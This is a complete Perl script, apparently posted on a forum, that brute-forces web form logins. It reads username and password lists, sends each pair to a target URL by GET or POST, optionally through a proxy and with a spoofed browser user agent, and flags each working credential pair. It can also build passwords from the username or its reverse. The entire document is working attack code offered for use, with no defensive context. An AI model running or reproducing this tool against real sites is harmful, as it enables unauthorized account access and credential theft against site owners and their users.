formbrute.pl
Код:
#!/usr/bin/perl
#
#
# @2002M.eiszner mei@websec.org
# form-based authentication brute forcer
#
# passfile accepts special vars:
# %%UID%% username
# %%UIDREV%% username-reverse
#
########################################
$|=1;
use strict;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
## get options
##
use vars qw($opt_m $opt_U $opt_u $opt_p $opt_l $opt_w $opt_o $opt_v $opt_f $opt_s $opt_h);
getopts("U:m:u:p:l:w:o:p:v:f:s:h:");
## vardecs
##
my $method = $opt_m || "GET";
my $url = $opt_U;
my $userfile = $opt_u;
my $passfile = $opt_p;
my $uservar = $opt_l || "username";
my $passvar = $opt_w || "password";
my $others = $opt_o || "";
my $proxy = $opt_v || "";
my $failure = $opt_f;
my $logfile = $opt_s;
my $header = $opt_h;
## hash for postreqs and headerinfos
##
my %PARAMS;
my %HEADERS;
## check that
##
if (!$url || !$userfile || !$passfile || !$failure)
{
print "\nusage: $0 -U [url]\n\t-m [method ( GET|POST )]\n\t-u [usernameFile]";
print "\n\t-p [passwordFile]\n\t-l [loginVariable]\n\t-w [passVariable]";
print "\n\t-o [otherVariables ( ie: submit=true&login=yes )]";
print "\n\t-v [proxyServer]\n\t-f [failureString]\n\t-s [saveFilename]";
print "\n\t-h [request-headers( ie: Referer:abc&Cookie:ng=omo )]\n\n";
exit 11;
}
## input validation
##
if ($url !~ /http:\/\//i && $url !~ /https:\/\//i)
{
$url = "http://".$url;
}
$url =~ s/[\n\r]//g;
## create user-agent
##
my $response;
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");
$ua->proxy('http', $proxy) if($proxy ne '');
## resultfile
if ($logfile ne '')
{
open (RF, "> $logfile") || die "cant open $logfile !?!\n";
}
## userloop
open (UF, "< $userfile") || die "cant open $userfile !?!\n";
while(<UF>)
{
my $uid = $_;
$uid =~ s/[\n\r]//g;
## passloop
open (PF, "< $passfile") || die "cant open $passfile !?!\n";
while(<PF>)
{
my $pwd = $_;
$pwd =~ s/[\n\r]//g;
## check password for specialities
##
$pwd = &special($uid,$pwd);
## fill hash with
## parameters
##
$PARAMS{$passvar} = $pwd;
$PARAMS{$uservar} = $uid;
my @pairs;
my ($key,$val,$k,$v,$si);
@pairs = split(/&/,$others);
## fill params hash with
## all possible additional
## params
##
foreach $si (@pairs)
{
($k,$v) = split(/=/,$si);
$PARAMS{$k} = $v;
}
## check out all the headers
## and fill the HEADERS-hash
##
my @hpairs;
$si = $k = $v = "";
@hpairs = split(/&/,$header);
foreach $si (@hpairs)
{
($k,$v) = split(/:/,$si);
$HEADERS{"$k"} = $v;
}
## the request itselve
## due to forms only GET
## and POST make sense
##
if ($method eq "POST")
{
$response = $ua->request(POST "$url", \%PARAMS, %HEADERS);
}
else
{
my $reqstr = "$url?$uservar=$uid&$passvar=$pwd&$others";
$reqstr =~ s/[\n\r]//g;
$response = $ua->request(GET "$reqstr", %HEADERS);
}
## check the response and
## write into resultfile
## and stdout
##
my $page = $response->content();
my $code = $response->code();
if ($code eq "200" && $page !~ /$failure/ig)
{
print "$uid:$pwd *** WORKED ***\n";
print RF "$uid:$pwd *** WORKED ***\n" if ($logfile ne '');
}
else
{
print "$uid:$pwd ($code)\n";
print RF "$uid:$pwd ($code)\n" if ($logfile ne '');
}
} # endpassloop
close (PF);
} # enduserloop
close (UF);
close (RF) if ($logfile ne '');
### end main begin subs
###
### sub special (pwd,uid)
### returns pwd
sub special
{
my $u = shift;
my $p = shift;
## check for %%UID%% in password
##
$p =~ s/%%UID%%/$u/ if($p =~ /%%UID%%/);
## check for %%UIDREV%% in password
##
if ($p =~ /%%UIDREV%%/)
{
my $tmp = "";
my $c = 0;
for ($c=length($u);$c>=0;$c--)
{
$tmp .= substr($u,$c,1);
}
$p =~ s/%%UIDREV%%/$tmp/;
}
## done
##
return $p;
}
